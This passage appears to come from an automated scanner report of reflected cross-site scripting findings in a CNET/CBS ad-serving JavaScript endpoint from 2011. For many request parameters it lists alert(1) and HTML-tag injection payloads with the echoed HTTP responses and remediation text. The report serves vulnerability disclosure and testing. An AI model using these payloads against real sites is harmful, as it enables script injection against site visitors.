This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:47 GMT Server: Apache/2.2 Content-Length: 1273 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:39:47 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=13178398867209220364971551d836*/alert(1)//0a0c542a09d&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=google.com&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- ...[SNIP]...
The value of the DVAR_CID request parameter is copied into a JavaScript inline comment. The payload bef49*/alert(1)//0ec78b97269 was submitted in the DVAR_CID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:39:30 GMT Server: Apache/2.2 Content-Length: 1289 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:39:30 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857bef49*/alert(1)//0ec78b97269&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=google.com&ADREQ&SP=80&POS=100&cookiesOn ...[SNIP]...
The value of the DVAR_CID request parameter is copied into the HTML document as plain text between tags. The payload ca43a<a>f02f430dd4d was submitted in the DVAR_CID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:40:48 GMT Server: Apache/2.2 Content-Length: 580 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:40:48 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857ca43a<a>f02f430dd4d&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=25098544&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _ ...[SNIP]...
The value of the DVAR_EXCLUDE request parameter is copied into a JavaScript inline comment. The payload d8532*/alert(1)//43aeb77e241 was submitted in the DVAR_EXCLUDE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:40:54 GMT Server: Apache/2.2 Content-Length: 1288 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:40:54 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=d8532*/alert(1)//43aeb77e241&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=google.com&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the DVAR_EXCLUDE request parameter is copied into the HTML document as plain text between tags. The payload a1cdd<a>a99ce525ab1 was submitted in the DVAR_EXCLUDE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:42:55 GMT Server: Apache/2.2 Content-Length: 580 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:42:55 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=a1cdd<a>a99ce525ab1&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=25098544&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2100' NCA ...[SNIP]...
The value of the DVAR_INSTLANG request parameter is copied into the HTML document as plain text between tags. The payload 76495<a>372bfe924d7 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:44:11 GMT Server: Apache/2.2 Content-Length: 579 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:44:11 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US76495<a>372bfe924d7&x-cb=25098544&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2100' NCAT='201:' CID='' TO BEACON TEXT) *//* MAC [r2011 ...[SNIP]...
The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 5cf15*/alert(1)//d9bcae83da was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:41:35 GMT Server: Apache/2.2 Content-Length: 1286 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:41:35 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US5cf15*/alert(1)//d9bcae83da&x-cb=20237291&IREFER_HOST=google.com&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the DVAR_SESSION request parameter is copied into a JavaScript inline comment. The payload c04ac*/alert(1)//fabf692086e was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:41:11 GMT Server: Apache/2.2 Content-Length: 1288 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:41:11 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=ec04ac*/alert(1)//fabf692086e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=google.com&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the DVAR_SESSION request parameter is copied into the HTML document as plain text between tags. The payload e141b<a>8a421f65f69 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:43:20 GMT Server: Apache/2.2 Content-Length: 580 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:43:20 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=ee141b<a>8a421f65f69&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=25098544&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2100' NCAT='201:' CID='' ...[SNIP]...
The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload fda34<a>f0d993cc01e was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:58 GMT Server: Apache/2.2 Content-Length: 580 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:38:58 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJSfda34<a>f0d993cc01e&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=250985 ...[SNIP]...
The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload 6b707*/alert(1)//2c8af5cdd57 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:20 GMT Server: Apache/2.2 Content-Length: 1246 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:38:20 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS6b707*/alert(1)//2c8af5cdd57&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=202372 ...[SNIP]...
The value of the IREFER_HOST request parameter is copied into a JavaScript inline comment. The payload 3961b*/alert(1)//e390b7cb9ec was submitted in the IREFER_HOST parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:41:59 GMT Server: Apache/2.2 Content-Length: 1272 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:41:59 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=google.com3961b*/alert(1)//e390b7cb9ec&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the IREFER_HOST request parameter is copied into the HTML document as plain text between tags. The payload 7ad9a<a>5ae1e2673f3 was submitted in the IREFER_HOST parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:45:01 GMT Server: Apache/2.2 Content-Length: 580 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:45:01 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=25098544&IREFER_HOST=google.com7ad9a<a>5ae1e2673f3&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2100' NCAT='201:' CID='' TO BEACON TEXT) *//* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx ...[SNIP]...
The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload 59295*/alert(1)//a6724e4de38 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:40:04 GMT Server: Apache/2.2 Content-Length: 1293 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:40:04 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A59295*/alert(1)//a6724e4de38&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=google.com&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad - ...[SNIP]...
The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload 8308e<a>d36e8d766c8 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:41:39 GMT Server: Apache/2.2 Content-Length: 597 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:41:39 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A8308e<a>d36e8d766c8&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=25098544&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON ...[SNIP]...
The value of the NODE request parameter is copied into the HTML document as plain text between tags. The payload 542c5<a>a6cfac4ae18 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:42:04 GMT Server: Apache/2.2 Content-Length: 579 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:42:04 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201542c5<a>a6cfac4ae18&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=25098544&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SI ...[SNIP]...
The value of the NODE request parameter is copied into a JavaScript inline comment. The payload fe065*/alert(1)//f15f6814d36 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:40:20 GMT Server: Apache/2.2 Content-Length: 1272 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:40:20 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201fe065*/alert(1)//f15f6814d36&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=google.com&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1a93'%3balert(1)//a41a53b7881 was submitted in the PAGESTATE parameter. This input was echoed as e1a93';alert(1)//a41a53b7881 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:43 GMT Server: Apache/2.2 Content-Length: 1302 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:38:43 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=e1a93'%3balert(1)//a41a53b7881&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A ...[SNIP]... 2526&pg=1317839886720922036497155&t=2011.10.05.18.38.43/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />'); ;window.CBSI_PAGESTATE='e1a93';alert(1)//a41a53b7881';/* MAC [r20110907-1630-TRUNKPOSTMERGE:1.13.14] phx1-ad-xw8.cnet.com::1519532352 2011.10.05.18.38.43 *//* MAC T 0.1.4.4 */
The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload a2f65*/alert(1)//b6e2c8e72fd was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:45 GMT Server: Apache/2.2 Content-Length: 1300 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:38:45 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=a2f65*/alert(1)//b6e2c8e72fd&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=goog ...[SNIP]...
The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload e81ec<a>8f907c3b071 was submitted in the POS parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:42:31 GMT Server: Apache/2.2 Content-Length: 665 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:42:31 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=google.com&ADREQ&SP=80&POS=100e81ec<a>8f907c3b071&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSNEWS' BRAND='55' SITE='162' SP='80' CNET-PTYPE='00' POS='100e81eca8f907c3b071' NCAT='201:' CNET-PARTNER-ID='1' DVAR_PSID='' ...[SNIP]...
The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload d0732<a>6e0c155b5a1 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:42:30 GMT Server: Apache/2.2 Content-Length: 596 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:42:30 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100d0732<a>6e0c155b5a1&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=25098544&IREFER_HOST=google.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PT ...[SNIP]...
The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload d97b0*/alert(1)//93a512347f1 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:40:37 GMT Server: Apache/2.2 Content-Length: 1272 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:40:37 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100d97b0*/alert(1)//93a512347f1&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=google.com&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload 899ce<a>63328640446 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:38:46 GMT Server: Apache/2.2 Content-Length: 625 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:38:46 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162899ce<a>63328640446&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=google.com&AD ...[SNIP]...
The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload bec83*/alert(1)//6f833b1fb2 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Wed, 05 Oct 2011 18:41:18 GMT Server: Apache/2.2 Content-Length: 1246 Pragma: no-cache Cache-Control: no-cache, must-revalidate Content-Type: application/x-javascript Expires: Wed, 05 Oct 2011 18:41:18 GMT
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20115857&CNET-PAGE-GUID=1317839886720922036497155&NCAT=201%3A&NODE=201&PTYPE=2100&DVAR_EXCLUDE=&DVAR_SESSION=e&cookiesOn=1bec83*/alert(1)//6f833b1fb2&DVAR_INSTLANG=en-US&x-cb=20237291&IREFER_HOST=google.com&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad --> ...[SNIP]...
The value of the cookiesOn request parameter is copied into the HTML document as plain text between tags. The payload da3c4<a>4c61eada3db was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
